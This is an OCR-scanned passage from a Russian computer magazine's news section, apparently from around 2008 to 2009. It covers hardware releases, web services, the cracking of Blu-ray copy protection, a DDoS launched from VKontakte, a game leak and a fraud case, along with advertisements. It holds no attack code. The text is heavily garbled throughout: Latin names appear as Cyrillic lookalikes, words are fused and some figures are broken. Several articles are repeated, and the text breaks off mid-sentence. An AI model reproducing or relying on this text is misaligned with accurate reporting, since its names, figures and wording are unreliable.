ше. Кулер состоит из 50 пластин алюминиевого радиатора, нанизанных 



Обо всем за последний месяц 




на шесть отполированных до зеркального блеска теплоотводныхтрубок, 
в свою очередь исполненных из алюминия и меди. Количество оборотов 
в минуту регулируется от 1000 до 1600 (выносной регулятор в комплекте], 
а уровень шума при этом составляет от 19 до 28 дБ. Также, благодаря 
технологии 5 р і га I Ріп ТесЬпоІоду, на поверхности устройства формирует- 
ся спираль, которая, позаверениям создателей, существенно улучшает 
его производительность. Ксожалению, цена и дата поступления кулера в 
продажу пока неизвестны, но будем ждать и надеяться. 



Віи-гау не устоял 

Окончательно взломать систему защиты Віи-гау дисков 
от копирования удалось группе хакеров с форумов Ооопп9 
Когит.с1оопп9.огд ). Поуказанной ссылке можно почитать 
подробности того, как идея превратилась в работающую 
технологию. Прогнозы некоторыханалитиков, предре- 
кавших, что в ближайшие8-10лет«раскусить»защиту не 
удастся, рухнули уже давно. По сути, ВБ+ была взломана 
еще пол года назад, когда в программе ЗІуЗоІІ: АпуОѴО 
появилась возможность просматривать зашифрован- 
ные диски. Но прога была платной, а решение от ребят с 
Ооот9 относится к ореп зоигсе и вполне подходит для ѴІ_С 
или тріауег. Ключом к взлому послужил тот факт, что де- 
шифровать Віи-гау диски могут нетолько аппаратные пле- 
еры, но и программные. Хорошая новость заключается в 
том, что теперь должен появиться даже Віи-гау плеер под 
Ыпих, создание которого в обход ВО+ было невозможно. 
Традиционно, есть и плохая — производители наверняка 
будут совершенствовать и менять схему ВБ+ как для про- 
граммных, так и для аппаратных плееров. А значит, нам 
придется искать новые версии софта или качать и ставить 
новые прошивки на аппаратные плеера. Хотя взломщиков 
это в любом случае не остановит. Скорее всего, эти версии 
падутточно также, каки старые. 
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Количество вредоносного ПО, удаляемого с машин российских юзер 
МісгозоЩ возросло на 86%і 



Затмение от М8І 



Тайваньская компания М5І, один из признанных лидеров в области создания сис- 
темных плат и другого, самого разнообразного, железа, представила новую мате- 
ринскую плату М5І Есіірзе. Интересной особенностью новинки является рекомен- 
дованная Іпіеі. технология 0гМ05 второго поколения, с возможностью управлять 
питанием чипсета. Напомним, что ОгМОЗубиваетсразу двух зайцев — обеспечи- 
вает прекрасную производительность, одновременно снижая энергопотребление. 
М5І Есіірзе — первая плата с 0гМ05 второго поколения на борту. За счетэтого 
удалось избавиться от громоздкой конструкции теплоотвода, заменив его на два 
изящных, но более чем действенных, теплопроводника. Производители уверяют, 
что плата с легкостью способна удерживать рабочуютемпературу в пределах45°С 
и даже в суровыхусловиях оверклокинга — в пределах 80°С. Ну, а чтобы счастье 
ценителей хорошего железа было более полным, в комплекте к М5І Есіірзе идет 
аппаратный аудио-процессор отСгеаІіѵе — Х-Еі, относящийся кЫдб-епсІ классу, 
плюс платы снабжаются звуковыми картами Х-ЕіХігете Аибіо. Помимо вышепере- 
численного, для Есіірзе разработали новый инструментарий ВІ05. Куже известным 
нам по плате МБІ Р45 фишкам добавились две функции СРІІ Зресібсаііоп и М-ЕІазЬ. 
Последний совершенноуникален, — это первый в своем роде инструмент, позволя- 
ющий загрузить через 115В вторую ВІ05 и протестировать ее перед установкой. 




Россия занимает А-е место в мире по 
числа юзеров страны. 



количеству пользователей ІРѵб — 0 . 76 % от общего 




Двуликий ноутбук 

Чего только ни придумывают производители ноутбуков, что- 
бы заинтересовать покупателя и перещеголять конкурентов. 
Вот и компания Ещіізи не стоит на месте. Несмотря на то, 
что идея ноутбуков с дополнительным дисплеем не нова и 
большой популярности не заработала, это не мешает Ещіізи 
пробовать и дерзать. Ноутбук и^еВоок N7010 с 16-дюймо- 
вым экраном и вспомогательным сенсорным дисплеем, 
диагональю 4" позиционируется производителем какзаме- 
на настольному ПК. Такомузаявлению вполне соответствует 
начинка: процессор Іпіеі Соге 2 Оио Р8400 (2.26 ГГц], 4 Гб 
оперативной памяти, дискретное видео АТІ Рабеоп НО 3470 
(256 Мб), жесткий дискна 320 Гб, привод Віи-гау, 3-мега- 
пиксельная камера, НОМІ-выход, съемный пылевой фильтр 
и даже клавиатура, защищенная от попадания жидкости. 

Но все же главной фишкой остается сенсорный ТоисЬ 2опе 
— такназвали в Ещіізи 4-дюймовый экран. На нем можно не 
только просматривать фото и управлять приложениями. На 
Тоисб Хопе можно вывести и само приложение, вместо того 
чтобы его минимизировать. По сути, это хоть и маленький, 
но полноценный второй монитор. Любителям в одном окне 
смотреть фильм, а во втором заниматься чем-то еще, это 
решение должно придтись по душе. Рекомендованная цена 
ноутбука составляет $1 500. 



Известный торрент-трекер ШерігаіеЬау.ог§ отправил заявку в книгу рекордов Гиннеса, 
достигнув отметки 25 МЛН. пользователей. 
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Самый мощный суперкомпьютер на планете — система Коайшппег компании ІВМ, 
производительностью 1.106 петафлоп. 



РауРаІ русифицировался 

Свершилось невероятное — великая и ужасная платежная система РауРаІ«за говорила» по-русски. РауРаІ, 
прозванная в народе«Палкой», хорошо известна как не самая дружественная кРоссии и странам СНГ система 
оплаты. До недавнего времените россияне, кто все же пользовался ееуслугами (например, совершая покупки 
через еВау), находились в крайне незавидном положении «жителей страны третьего мира». На сайте РауРаІ 
не было русского интерфейса, возможность принимать платежи для нашей страны отключена до сих пор, да и с 
оплатой покупокто и дело возникаютпроблемы. Носитуация, похоже, начинаетменяться клѵчшемѵ— раѵраі. 
сот внезапно явил нашим пользователям грамотный русский интерфейс. Стоит отметить, что, считая великий 
и могучий, сайт переведен всего лишь на 5 языков. По Сети сразу поползли слухи, что к концу 2009-го года 
русскоязычную площадку планирует освоить и еВау, а значит недалеко до возможности принимать на РауРаІ 
деньги, выступая в качестве полноценного продавца. Насколько оправданы эти ожидания — неизвестно, а вот 
ожидать поддержку на родном языке, скорее всего, действительно стоит. Без сомнения, это должно облегчить 
жизнь многим любителям сетевого шоппинга. 




В самолет по штрих-коду 



Технологии будущего с пугающей скоростью становятся технологиями настоящего. Например, весьма 
интересную идею выдвинула и воплотила авиакомпания Ат егі сап Аігііпез. Она предоставила своим 
клиентам услугу отправки билета прямо на мобильный телефон в цифровом виде. Штрих-код при этом 
и вовсе пересылается отдельным графическим файлом с большим разрешением. Получается, что рас- 
печатывать билет нет никакой необходимости. Если экран мобильного позволяет, достаточно вывести 
на него картинку штрих-кода и поднести телефон к специальному сканеру в аэропорту. Загвоздка пока 
заключается л ишь в том, что подобными «специальны ми сканерами» оснащены далеко не все аэро- 
порты вСША, неговоряо других странах. Тем не менее, сходную систему сейчас тестирует еще одна 
американская авиакомпания — Ре На Аігііпез. Интересно, как быстро технология доберется до других 
стран, и как на это отреагируют хакеры :). 
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«Одноклассники» 

Не та к давно одна из крупнейших российских социальный сетей «Од- 
ноклассники» начала монетизироваться (мы писали об этом — в качест- 
ве пробного шара была запущена платная услуга «режим невидимки»]. 
Затем последовали и другие «дополнительные услуги»... а теперь 
создатели ресурса, очевидно, посчитали, что от пробных попыток пора 
переходить к более серьезным действиям. Ход конем сделан — ре- 
гистрация новых пользователей на «Одноклассниках» стала платной. 
Оплата производится опять же посредством 5М5. Стоимость активации 
аккаунта составляет около $1 США (сумма варьируется в зависимости 
отоператора). Тем, кто не хочет платить, предоставляется урезанная 
версия сайта: без возможности выставлять оценки фотографиям и пи- 
сать комментарии. Но особенно интересно, что подается все под видом 
борьбы со спамом. Официальная формулировка: «Это вынужденная 
мера, необходимая для поддержания порядка на сайте и защиты 
всех пользователей от автоматической рассылки спама. Спасибо за 
понимание!». Сомнений нет, платная регистрация сыграетсвою роль 
и в борьбе со спам -рассылка ми. Но, сдается нам, первичная задача 
новшества далека от столь благородных целей. 



С>ѴѴХСА-мониторы 

грядут 

Сразу двумя новинками порадовали нас производители монито- 
ров, — да какими ! Широкоформатные дисплеи уже и так потихонь- 
ку становятся нормой, но компания Затзипд решила «развить 
мысль», представив публике первый в мире ОѴѴХОА-монитор. 
23-дюймовая модель 2342 В ѴѴХ с соотношением сторон 16:9 
обладает разрешением 2048 х 1 1 52. Благодаря этому на экране 
спокойно умещаются сразу два документа формата А4 — и еще 
остается место для Ѵізіа ЗісІеЬаг. Однако технические характе- 
ристики выглядят не столь внушительно: контрастность монитора 
— 20000:1, время отклика составляет 5 мс, а размер пикселя 0.249 
миллиметра. Интересно, что на родном корейском рынке 2342ВѴѴХ 
будет стоить всего $295, но время начала поставок в другие страны 

и цены для них пока не объяв- 
лены. Не отстает от Затзипд и 
компания 0е11. Вскоре после 
презентации 2342ВѴѴХ БеИтоже 
объявил о выпуске 0ѴѴХ0А-мо- 
нитора — 5Р2309. Разрешение 
у Бе II аналогичное: 2048 х 1 1 52, 
а вот остальное выглядит более 
многообещающе: заявленная 
динамическая контрастность 
80000:1 , цветовой охват про- 
странства КІТЗС 98% и время 
отклика при этом всего 2 мс. 
Цена на 5Р2309 пока неизвест- 
на, даже «родная». 
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Порядка 20 % потребителей США отказались от сетевых покупок из-за страха перед кр 
личных данных. 



«Вконтакте» как оружие 




Пока «Одноклассники» вводят платную регистрацию, руководитель 
проекта «Вконтакте» Павел Дуров балуется ООоЗ-атаками, используя 
свою социальную сеть как орудие возмездия. Объектом атаки стал 
сайт«Премии рунета», неприятности с которой началисьу «Вконтак- 
те» еще в прошлом году. Тогда, по словам Дурова, проголосовать за его 
детище смогла от силы лишь десятая часть пользователей ресурса. 
Сайт премии просто не выдерживал нагрузок, ввиду огромного коли- 
чества желающих отдать голос любимой соц. сети. В итоге, «Вконтак- 



те» занял второе место, уступив первое Ьазб.огд.ги . В текущем году 
«Вконтакте» на «Премию рунета» официально не номинировался, но 
его выдвинули пользователи, что предусмотрено правилами. Узнав об 
этом, Павел Дуров не растерялся и попросил организаторов удалить 
свой сайт из списка участников. Те, в свою очередь, направили Павлу 
е-таііс просьбой подтвердить свое намерение быть исключенным 
из голосования и заверениями, что в этом году ситуация сзависа- 
нием сайта не повторится, — на что Дуров отреагировал не совсем 
адекватно. Заявив, что организаторы его игнорируют, он добавил в 
код «Вконтакте» маленький кусочек, из-за которого каждый заходя- 
щий на сайт пользователь, сам того не подозревая, обращался ксайту 
ргетіагипеіа.ги . «Премия рунета» не выдержала и «легла» почти 
на день. Сам Дуров объяснил свои действия проведением «тест- 
драйва». Он сказал, что просто хотел проверить, действительно ли 
прошлогоднюю нестабильность сайта устранили, какего заверили ор- 
ганизаторы. Оказалось, что нет, и Павлутеперь вполне может грозить 
судебное разбирательство. После инцидента «Вконтакте», конечно, 
был исключен из списка участников. 



Виртуальный железный занавес 



Правительства разных стран стремятся ограничивать сетевую свободу 
своих граждан, — этот факт уже не нов. Достаточно вспомнить Китай с 
его «Золотым щитом» или недавнюю блокировку ЖЖ властями Казах- 
стана. Наше правительство, какэто ни удивительно, пока строитель- 
ством шлюзов, подобных китайскому, не озадачивалось, зато наши 
разработчики ПО, что еще более удивительно, высказываются «за». 
Идея Евгения Касперского о введении интернет-паспортов в свете 
последних событий начинает казаться совсем безобидной. Дело втом, 
что теперь президент отечественной ассоциации разработчиков ПО 
Валентин Макаров выступил с предложением создать в России шлюз, 
который отделит нас от всего остального интернета. По его мнению, 
совсем не обязательно использовать подобную конструкцию для ущем- 
ления свободы в Сети, ведь это еще и удобный инструмент для борьбы 
с недобросовестным ее использованием. При этом он предлагает 
опираться на опыт уже упомянутого Китая, Сингапура иЯпонии.и даже 
подсчитал, что на создание шлюза уйдет порядка 1 0 лет и несколько 
сот миллионов долларов, которые с радостью должны предоставить 
инвесторы. Утешает одно — с людьми, принимающими решения по 
таким вопросам, свой проект Павел пока не обсуждал. Хотелось бы 
думать, что идея Макарова не придется им по душе, даже если им ее 

«Резиновый» Віи-гау 

Как известно — места много не 
бывает, и неважно, о чем идет 
речь: о емкости жесткого диска, 
или же о любом другом носи- 
теле информации. Последнее 
время ученые всего мира активно 
стараются увеличить объем 
оптических дисков. Венцом прогресса пока считается формат Віи-гау, 
вмещающий до 54 Гб. Над увеличением этой цифры бьются лучшие 
умы планеты. Так, Ю К уже анонсировала появление 1 00- гигабайтных 
Віи-гау дисков, а компания Ріопееглетом 2008 года продемонстри- 
ровала прототип на 400 Гб. Однако все это может показаться детским 




представят, потому как слишком хорошо известно, куда ведут дороги, 
вымощенные благими намерениями. 



лепетом в сравнении с разработкой университета Беркли. Тамошние 
гении измыслили технологию, способную увеличить емкость Віи- 
гау, ни много, ни мало, до одного терабайта. Разработка получила 
название «летающая плазмоническая головка». На деле это не что 
иное, как группа металлических линз, направляющих лазерный луч 
сквозь возбужденные электроны. Такой луч способен наносить на диск 
дорожки на но- размеров, и сами создатели сравнивают скорость и 
точность работы головки с «Боингом 747», летящим в 2 мм над землей. 
По сути, вся эта конструкция напоминает старый проигрыватель для 
виниловых пластинок, которым ученые и вдохновлялись. Коммерчес- 
кое производство и применение «ретро- нов инки» планируют начать 
уже в течение ближайшей пятилетки. 
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Новая жертва торрентов 



Использование 
Р2Р-сетей все 
чаще стало ка- 
раться по закону. 
Особенно остро 
этот вопрос встает, 
когда речь заходит 
о распростране- 
нии пиратских 
версий софта, 
игр или фильмов, 
просочившихся в 
Сеть еще до офи- 
циального релиза. 
Громкий прецедент 

такого рода произошел в 2002 году в США, когда в интернет попал еще 
не вышедший на экраны фильм «Звездные войны: Атака клонов». 

Тогда виновника нашли и осудили. Атеперь«похвастаться» схожим 



ъ- 

/ , і ' 



судебным процессом может и Россия. В начале этого года, за месяц до 
официальной премьеры, в Сеть мистическим образом просочилась 
игра «Аззазіп’з СгеесІ». Как выяснилось позже, утечка произошла пря- 
мо из офиса российского издателя — компании «Акелла». Распутать 
виртуальные следы удалось службе безопасности «Акеллы» и специ- 
алистам по борьбе с кибер-преступлениями из организации «Русский 
щит». Оказалось, что один из работников «Акеллы» сделал полную 
копию игры для друга, взяв с то го обещание, никуда ее не копировать, 
никому не давать итем более нетиражировать. Студент4-го курса МГУ 
Даниил Максименко согласился, а через месяц, обсуждая на торрент- 
трекере демо-версию «Аззазіп’з Сгееб», не удержался и похвастался 
тем, чтоу него есть полная. Когда ему не поверили и подняли на смех, 
парень, недолго думая, выложил игру на раздачу, и она моментально 
разлетелась по всему миру, благо игровое сообщество оченьжда- 
ло релиза. Материальный ущерб компании-разработчка ІІЬізоЛ в 
результате этого составил порядка $10 млн., а приговор Даниила — 2 
года условно. Однако, судя потому, как бодро сейчас качают и раздают 
Раііоиі: 3, напугать кого-либо в России такими вещами сложно. 



1-го: 
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Черным по белому 

«Весь рынок» устройств для чтения электронных книжек на базетехнологии Е-Іпк, сегодня представлен 
буквально парой десятков девайсов. Они занимаютсвою, весьма специфичную, нишу — идо покорения 
широких масс им пока далеко. Выбирая между навороченным коммуникатором или КПК и аскетической 
электронной читалкой, пользователь, как правило, предпочтет первое. Куда монохромному экрану, способ- 
ному пусть и прекрасно отображать текст, да статичные картинки, угнаться за всем спектром мультимедийных 
развлечений, предлагаемых современными гаджетами! Однако электронные чернила тоже не стоят на месте. 
По сути, Е-Іпк экраны точно также могут быть цветными (на выставках по всему миру это демонстрируется уже 
не первый год], и, в теории, способны воспроизводить видео. Но такое мы увидим на прилавках магазинов не 
раньше, чем через 3-4 года. А пока ридеры сделали лишь очередной маленький шаг навстречу пользовате- 
лям при помощи компании Зопу, выпустившей в свет новую читалку РН5-700. Устройство ярко выделяется на 
фоне себе подобных за счет сенсорного экрана и встроенной диодной подсветки. С одной стороны, благодаря 
ним ридер обрел более современные черты и, наконец, избавил приверженцев е-буков от необходимости 
покупать дополнительные осветительные приборы, с другой — из-за нововведений экран потерял в четкости 
и посерел, а это практически главное преимущество Е-Іпк. Ценатоже неутешает — порядка $400 за океаном. 
Очень похоже, что в стремлении угодить избалованной публике Зопу допустила промашку. Ценители Е-Іпк, 
скорее всего, пройдут мимо новинки, разочаровавшись в качестве изображения, а потягаться сустройствами 
вне своей тесной ниши РК5-700 по-прежнему не может. 




Русские хакеры настолько суровы... 

Русская смекалка порой просто поражает воображение, а уж когда дело 
касается не очень легальных путей обогащения, возможным становится 
даже невозможное. Два простых русских иммигранта — Николас Лэйкс 
и Вячеслав Беркович — умудрились хакнуть сайт заіегзузющ. Данный 
ресурс, между прочим, принадлежит министерству транспорта США — на 
нем выложен списокфедеральныхтранспортных компаний, занимаю- 
щихся грузоперевозками. Сообразительные хакеры обнаружили на сайте 
уязвимость и придумали следующее — они временно заменяли адрес и 
телефон одной иззарегистрированныхтам компаний на свои и находили в 
Сети заказ на доставку груза. Затем, по-прежнему отлица крупной транс- 
портной компании, перепоручали доставку любой реально существующей 
фирме-грузоперевозчику. По «выполнении заказа», получив от клиента 
деньги, мошенники исчезали, возвращая контактные данные в исходный 
вид. Благодаря найденной дырке, Лэйкс и Беркович делали деньги бук- 
вально из воздуха на протяжен и и трех лет. За это время им удалось стать 
богаче на $500.000, и теперь им предъявляют обвинение в мошенничест- 
ве с использованием компьютера, телефонной связи и почты. 
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ІІ8В з-о, финальная спецификация 

Еще в сентябре текущего года на форуме ЮР вице-президент компании Іпіеі официально 
объявил отом, что работа над 115В 3.0 идет полным ходом, и назвал совершенно головокружи- 
тельные цифры, пообещав пиковую скорость обмена данными около 5 Гб/сек. Озвученная Пэтом 
Гелсингером информация начинает подтверждаться. На 115В Ітріетепіегз Рогит были опуб- 
ликованы финальныетехнические характеристики грядущего ІІпіѵегзаІ 5егіаІ ВизЗ.О, согласно 
которым скорость действительно будет достигать 4.8 Гб/сек, что в 10 раз быстрее 115В 2.0. По- 
мимо этого увеличили энергоэффективность стандарта 5ирег5реесІ 115В, добавили поддержку 
более длинных соединительных кабелей и, разумеется, оставили обратную совместимость со 
всеми предыдущими версиями 115В. Единственное, от чего та к и не удалось избавиться — вы- 
сокая загрузка процессора. Но разработчики уверены, что это не такая уж серьезная проблема, 
ведь производительность 115В 3.0 оставляет позади и е5АТА, и ІЕЕЕ 1394с, а значит, есть смысл 
пожертвовать ради него свободными системными мощностями. В продаже компьютеры и желе- 
зо с 115В 3.0 на борту должны появиться уже в 2009 году. 

Фестиваль короткометражных фильмов 

5сбѵѵеррез, всемирно известный производитель газированных напитков для взрослых, пред- 
ставляет фестиваль короткометражных фильмов. В этом мероприятии участвует много смелых 
и неординарных режиссеров: Ноа Маршалл с фильмом «Последствия»; Джемс Пилкинітон 
(«Великолепный!»]; Кезия Барнетт («М и стер Джет Блэк»]; Мелани Бридж («Коллекционер»] и 
ПатрикХьюз («Знаки»]. Для прьемьер фестиваля была выбрана уникальная площадка — интер- 
нет-кинотеатр ѵѵѵѵѵѵ.зсбѵѵеррез.ги. Нигде больше: ни в кинотеатрах, ни потелевизору, ни на каких 
закрытых показах фильмы идти не будут. 



5СНѴѴЕРРЕ8 

ФЕСТИВАЛЬ КОРОТКОМЕТРАЖНЫХ ФИЛЬМОВ 
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Создано дня проиессоров Й(1Ш РНепоітГ 

Поддержка процессоров АМО Рбепот™ и 
технологии НурегТгапзрогЕ™ 3.0 
для увеличения пропускной способности между СРІІ 
и системой 



Поддержка СгоззРігеК™ 

Поддержка технологии СгоззРігеХ™ обеспечивает 
несравненные возможности расширения 30 графики 



7.1-канапьный звук 

высокой четкости ОиаІ ПіуііаІ Пшііо 

Наслаждайся исключительной точностью 
воспроизведения звука благодаря 
сертифицированным аудио ОТ5 СОІМІМЕСТ™ и ОоІЬу 
ОідіЕаІ Ыѵе™ и соотношением сигнала к шуму ЮбдБ 

Погшерлш патяти ОиаІ 0002 ІОббШНі** 



(Ні 



Поддерживает процессоры РИепот™ РХ, РЬепот™ зоскеі АМ+ и процессоры АЫіІоп™ 64 

Поддерживает НурегТгапзроП™ 3.0 для увеличения пропускной способности 
между СРІІ и системой 

Память ОиаІ ОРК2 1066**/800/667/533МН2 (8СВ Мах.) 

4*РСІе х 16 Сеп2.0 с поддержкой СгоззРігеХ™ (4*х8 или 2*х16) 

7.1-канальный звук высокой четкости ОиаІ Оідііаі Аисііо с поддержкой технологий 
ОТ5 СОІМІМЕСТ™ и ОоІЬу Оідііаі Ыѵе™ 

100% ТВЕРДОТЕЛЬНЫЙ конденсатор и ферритовые сердечники для большей надежности 
и производительности системы 



Москва: РгоГСот - (495)730-5603; ЗіагіМазіег - (495)783-4242; Арбайт компьютера - (495)725-8008; АРКИС - (495)980-5407; Белый ветер ЦИФРОВОЙ - (494)730-3030; Инлайн - (495)941-6161; КИБЕРТРОНИКА - (495)504-2531; 
Лайт Коммуникейшн - (495)956-4951; НЕОТОРГ - сеть компьютерных магазинов - (495)223-2323; Сетевая Лаборатория - (495)500-0305; Форум-Центр - (495)775-775-9. 



Альметьевск: Компьютерный мир - (8553)256-934; Барнаул: К-Трейд - (3852)66-6910; Воронеж: Рет - (4732)77-9339; Екатеринбург: Зрасе - (343)371-6568; Трилайн - (343)378-7070; Ижевск: Корпорация Центр - (3412)438-805; 

Курск: ФИТ (ТСК 2000) - (4712)512-501; Новосибирск: НОТА - (3832)304-1010; Пермь: Инстар Технолоджи - (342)212-4646; Пятигорск: Дивиком - (8793)33-0101; Ростов-на-Дону: Форте - (863)267-6810; Самара: Аксус - (846)270-5960. 

** 1066МН2 доступно только с процессорами АМ2+ 
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Будущее 
кредитных карт 

Проблема безопасности платежей 
по кредиткам стоит перед банками 
и сходными организациями давно 
и в полный рост. Оригинальный 
способ обезопасить деньги при 
покупках онлайн предложила 
своим клиентам Ѵіза Еигоре. 
Компания продемонстрировала 
общественности новые кредитные 
карты, оснащенные клавиатурой 
и мини-дисплеем для генерации 
одноразового секретного кода. 

В целом карточка не отличает- 
ся отобычной — наличествует 
магнитная полоса, да и габариты аналогичны. Вся разница в том, что 
вводить свой постоянный РІІМ-код теперь нужно на клавиатуре самой 
карты, и нужды «светить» им в Сети больше нет. После ввода РІ N ’а на 
встроенном экране сгенерируется временный секретный ключ, который 
и будет использован для подтверждения сетевой транзакции. Разуме- 
ется, таким одноразовым кодом не смогут воспользоваться мошенники, 
даже если он попадет к ним в руки, — на то он и одноразовый. Насколько 
удачной окажется идея Ѵіза Еигоре, покажут время и отзывы первых 
обладателей новшества. 




Дави на газ! 




«Собаке» 

поставят памятник 




Кактолько ни называют символ 
«И». Мы говорим «собака», 
а в других странах прозвища 
варьируются от«обезьяньего 
хвостика» до «уточки» или 
«клеща». Но суть от этого не 
меняется: 0 плотно вошел 
в нашужизнь, благодаря электронной почте, хотя применяется он 
не только для отделения имени пользователя от названия домена. 
Символ стал настолько узнаваем и распространился так широко, что в 
2004 году его даже добавили в азбуку Морзе, чтобы упростить передачу 
е-таіі адресов. Сегодня «собаку» прочно ассоциируют с интернетом, 
хотя точное происхождение символа неизвестно, и по одной из версий 
уходит корнями в XVI век. Все это, похоже, мало волнует комиссию 
по монументальному искусству при Мосгордуме, которая приняла 
решение поставить в Москве памятник«собаке». Оригинальный 
проект на рассмотрение комиссии выдвинул один из крупнейших 
российских интернет-порталов. Какой именно, — остается загадкой, 
зато известно, что авторы идеи также предлагают организовать вокруг 
композиции зону бесплатного беспроводного доступа в интернет 
— для привлечения публики. Пожалуй, вместо этого им бы стоило для 
начала подумать отом, как быть с авторскими правами, и выбрать для 
памятника место, согласовав его с Москомархитектурой. 




На улице любителей автосимуляторов праздник— компания Оеіепсіег 
выпустила сразу два великолепных игровых руля. Первый — Реіюпсіег 
Еогзаде — станет отличным выбором, какдля начинающего игрока, 
так и для искушенного профи. Имеются здесь и увеличенный набор 
о 1 2 клавишах, которым можно присваивать различные значения, и 
подрулевые переключатели, дублирующие педали газа и тормоза, и 
блокпереключения скоростей, и 8-позиционный переключатель видов. 
Угол наклона руля при этом составляет всего 45°, так что он не заслоняет 
собой монитор. Кстолу, или другой поверхности, девайс надежно кре- 
пится струбциной и присосками. Практически исключена возможность 
случайно сдвинуть его с места, даже во время самой напряженной игры. 



Добавим к этому реалистичные разноразмерные педали, прорезинен- 
ные подкладки на руле, эффект вибрации при столкновениях и авариях и 
получим отличное геймерское решение. 

Вторая модель— Оеіюпсіег Еогзаде ТигЬо — предназначена для бывалых 
игроков и предлагает крупный рульс прорезиненными вставками и 
ручкой переключения скоростей. По характеристикам он схоже Оебепсіег 
Еогзаде, разве что кнопокздесь десять, а позиций у переключателя 
видов четыре. Две педали, имитирующие автомобильные, эффектвиб- 
рации, и надежная система фиксации — в комплекте. Диаметр рулевого 
колеса для обеих моделей равен 280 мм, угол поворота 180°. Средняя 
розничная цена рулей составляет 1200 рубликов. 



► 014 
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В прошлом году в Японии арестовали 
в ДВсі раза больше хакеров 

(1442 ареста) ,чемв 

предыдущем. 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 

ТЕПС/ЫНІ ИНТЕРНЕТ 

I ЬЛЬФІІП ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 

* Подключение - в любом месте 
Москвы и Московской обл. 

• Срок подключения в Москве - 14 дней, 
в Московской обл. - от 14 до 30 дней. 

* Установка прямого московского телефонного номера 



Против кого 
дружить будем? 

Совершенно уникальный альянс сформировали компании Соодіе, 
ѴаЬоо и М ісгозоН передлицом нарушения прав человека и свобо- 
ды слова. ІТ-мастодонты объединились с рядом инвестиционных и 
правозащитных организаций в ОІоЬаІ Ыеіѵѵогк Іпібабѵе («Все- 
мирная сетевая инициатива»], решив сообща выступить против 
стран подобных Китаю или Ирану, сотрудничеством с которым их 
попрекают регулярно. Не секрет, что на востоке пользователей 
держат под колпаком, правительствотам имеет практически бес- 
препятственный доступ к любым частным данным юзеров, а ин- 
тернет-цензура цветет пышным цветом. Місгозоіф Соодіе иУабоо 
не раз помогалитамошним властям получить доступ к приватной 
информации юзеров, предоставляя им любые логи без лишних 
проволочеки закрывая на многое глаза. Похоже, теперь с этим по- 
кончено. Компании подписали общий свод правил о ведении дел 
в странах, где права человека и свобода слова ограничиваются. 
Например, согласно этой бумаге, правительство «неблагонадеж- 
ной» страны обязано будет предоставить письменное сообщение, 
если ему вдругзахочется получить какую-то личную информацию о 
пользователе. В сообщении придется разъяснять правовую осно- 
ву этих действий. Крометого, СІоЬаІ Ыеіѵѵогк Іпібабѵе собирается 
контролировать деятельность интернет-компаний на рынках, по- 
добных китайскому, и выпускать ежегодные отчеты о соблюдении 
своего новоявленного «кодекса» в такого рода странах. 
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• Многоканальные телефонные номера 
• ІР-телефония 



* Выделенные линии Интернет 
* Корпоративные частные сети (ѴРМ) 



* Хостинг, услуги сіаіа-центра 



РМ Телеком ’ 

ѵѵѵт.гті.ги е-таіІ:іп(о@ гті.ги (495) 988-8212 




^ тедапеѵг 



Новая жертва торрентов 



Использование 
Р2Р-сетей все 
чаще стало ка- 
раться по закону. 
Особенно остро 
этот вопрос встает, 
когда речь заходит 
о распростране- 
нии пиратских 
версий софта, 
игр или фильмов, 
просочившихся в 
Сеть еще до офи- 
циального релиза. 
Громкий прецедент 

такого рода произошел в 2002 году в США, когда в интернет попал еще 
не вышедший на экраны фильм «Звездные войны: Атака клонов». 

Тогда виновника нашли и осудили. Атеперь«похвастаться» схожим 



ъ- 

/ , і ' 



судебным процессом может и Россия. В начале этого года, за месяц до 
официальной премьеры, в Сеть мистическим образом просочилась 
игра «Аззазіп’з СгеесІ». Как выяснилось позже, утечка произошла пря- 
мо из офиса российского издателя — компании «Акелла». Распутать 
виртуальные следы удалось службе безопасности «Акеллы» и специ- 
алистам по борьбе с кибер-преступлениями из организации «Русский 
щит». Оказалось, что один из работников «Акеллы» сделал полную 
копию игры для друга, взяв с то го обещание, никуда ее не копировать, 
никому не давать итем более нетиражировать. Студент4-го курса МГУ 
Даниил Максименко согласился, а через месяц, обсуждая на торрент- 
трекере демо-версию «Аззазіп’з Сгееб», не удержался и похвастался 
тем, чтоу него есть полная. Когда ему не поверили и подняли на смех, 
парень, недолго думая, выложил игру на раздачу, и она моментально 
разлетелась по всему миру, благо игровое сообщество оченьжда- 
ло релиза. Материальный ущерб компании-разработчка ІІЬізоЛ в 
результате этого составил порядка $10 млн., а приговор Даниила — 2 
года условно. Однако, судя потому, как бодро сейчас качают и раздают 
Раііоиі: 3, напугать кого-либо в России такими вещами сложно. 



1-го: 
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Черным по белому 

«Весь рынок» устройств для чтения электронных книжек на базетехнологии Е-Іпк, сегодня представлен 
буквально парой десятков девайсов. Они занимаютсвою, весьма специфичную, нишу — идо покорения 
широких масс им пока далеко. Выбирая между навороченным коммуникатором или КПК и аскетической 
электронной читалкой, пользователь, как правило, предпочтет первое. Куда монохромному экрану, способ- 
ному пусть и прекрасно отображать текст, да статичные картинки, угнаться за всем спектром мультимедийных 
развлечений, предлагаемых современными гаджетами! Однако электронные чернила тоже не стоят на месте. 
По сути, Е-Іпк экраны точно также могут быть цветными (на выставках по всему миру это демонстрируется уже 
не первый год], и, в теории, способны воспроизводить видео. Но такое мы увидим на прилавках магазинов не 
раньше, чем через 3-4 года. А пока ридеры сделали лишь очередной маленький шаг навстречу пользовате- 
лям при помощи компании Зопу, выпустившей в свет новую читалку РН5-700. Устройство ярко выделяется на 
фоне себе подобных за счет сенсорного экрана и встроенной диодной подсветки. С одной стороны, благодаря 
ним ридер обрел более современные черты и, наконец, избавил приверженцев е-буков от необходимости 
покупать дополнительные осветительные приборы, с другой — из-за нововведений экран потерял в четкости 
и посерел, а это практически главное преимущество Е-Іпк. Ценатоже неутешает — порядка $400 за океаном. 
Очень похоже, что в стремлении угодить избалованной публике Зопу допустила промашку. Ценители Е-Іпк, 
скорее всего, пройдут мимо новинки, разочаровавшись в качестве изображения, а потягаться сустройствами 
вне своей тесной ниши РК5-700 по-прежнему не может. 




Русские хакеры настолько суровы... 

Русская смекалка порой просто поражает воображение, а уж когда дело 
касается не очень легальных путей обогащения, возможным становится 
даже невозможное. Два простых русских иммигранта — Николас Лэйкс 
и Вячеслав Беркович — умудрились хакнуть сайт заіегзузющ. Данный 
ресурс, между прочим, принадлежит министерству транспорта США — на 
нем выложен списокфедеральныхтранспортных компаний, занимаю- 
